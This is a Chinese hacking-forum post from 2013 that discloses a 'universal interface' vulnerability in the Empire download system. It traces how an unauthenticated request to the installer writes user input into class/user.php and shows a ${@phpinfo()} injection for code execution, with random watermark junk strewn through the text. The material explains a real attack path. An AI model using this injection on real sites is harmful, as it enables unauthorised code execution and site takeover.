帝国万能接口漏洞0day

admin · 发表于 2013-1-23 09:34:37

这是帝国的一套下载系统如图 ps(不需要任何账户和密码，直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口，如图而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码当我们
# Y8 p- C, s8 P/ b
& J+ M9 r! B7 l* r

3 |1 V4 @  c9 M4 h, k这是帝国的一套下载系统如图
- R: O9 j* }8 q3 X% ]9 U3 V4 |ps(不需要任何账户和密码，直接写shell)

+ |  o- W  [! l
由于很多站是由于下载要整合discuz 等等一些论坛....
- G* C; m/ W" l1 g% M
/ v) a* [6 w( x- H. Z5 B- Q9 r
而帝国他又有一个万能接口，如图
& h  S. f( e- a8 M

% X$ j, u+ y% Y7 R9 B; S2 y, F0 I! e
" y, Y" Q- V  {1 a/ S( D+ ^9 v! ~" U
而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码
3 B8 f  |6 ~  q# ?2 t  s. ^  E) T0 P9 H4 G
当我们提交的时候，他地址是提交到index.php?install=1&setup=SetConfig
1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}
复制代码
他这里开始调用一个SetUserCOMConfig的函数了，我们继续跟踪
$ z* m4 \* z) @& b  n" }
' ?) A2 A  v: n" Y5 x4 g4 @# H在data/fun.php中的15行2 E; Z# I7 P3 W/ _' c2 _( r
) s8 ]. @3 v$ h5 {
我们可以看到这个函数
1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {
7 ~& D/ o- J6 B) G5 X+ `6 J
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);
复制代码
.....//省略若干* a4 ~* }- c3 i9 c. w. q
& A" }' t6 v, z. _& C
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);+ k( S8 Y4 `( S1 X* ~7 Y

6 n4 p) ~7 w5 `; |, r( o. c6 `1 V他将传进来的变量进行了切割，然后赋给了$filetext( y3 H* Y$ L3 P% N' j4 v  q
, s1 L: E/ H, A, G3 g! j  G+ h( ?  y
然后看下面
1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
6. }
7. @fputs($fp,$filetext);
复制代码
打开了一个class/user.php文件，然后将$filetext写入了- ?) @" P5 a# K2 P! D6 j) D
, V3 p! f# x% m
我们看看写入的结果，随便填一个
2 T. D/ q. H0 }8 B- c

/ `! N  G  I- u+ ?0 J3 K4 u  i# I6 d

; M# q, f: t& {5 k7 s1 R- F/ l! R1 |/ ^3 ~# z) y1 b  r( r
5 p" H1 p& y, |% |( [" F( x4 S

1 C' ?/ q0 f% K+ j2 b* M( v4 p! ]! |# \# q9 A
5 I% u7 |2 H- F& ?; z) f! J

' C0 T& K; G+ U! `1 c
* L/ |" q9 Z2 D. h3 K8 F6 ?* Y
' w4 p' C" M; E( O$ A+ ?/ M& d$ i3 b) f. ^/ P+ z

3 s4 j' h, n; d" X9 A4 s  o1 C! c' j5 I& F; H% T% }2 j
1 U* p3 V$ _% E8 R7 U; X
- g4 W0 t3 P; m2 p& b4 t

/ t" M5 b& E* h  f, E" _
3 u8 L4 j! n/ J+ X
% l" f- u1 N4 {7 Q8 c
2 \- |4 Y0 s4 E0 L
所以我们淫荡点，写个${@phpinfo()}试试

# D9 e3 j+ u# B5 Q0 `# F2 O
然后访问以下class/user.php这个文件4 ~3 l' A: T9 o$ W* \
日了吧

+ {" [+ _0 n  E+ o0 `
/ O- o7 W3 h  @* y6 z1 r1 Y, V* z: i* \; j7 n) E1 [0 j4 j

; d. i. Z8 g  Y8 p4 L7 t$ p$ }1 _0 Y, Z* ~% P& s

		自动登录	找回密码
密码			立即注册

帝国万能接口漏洞0day

本帖子中包含更多资源

浏览过的版块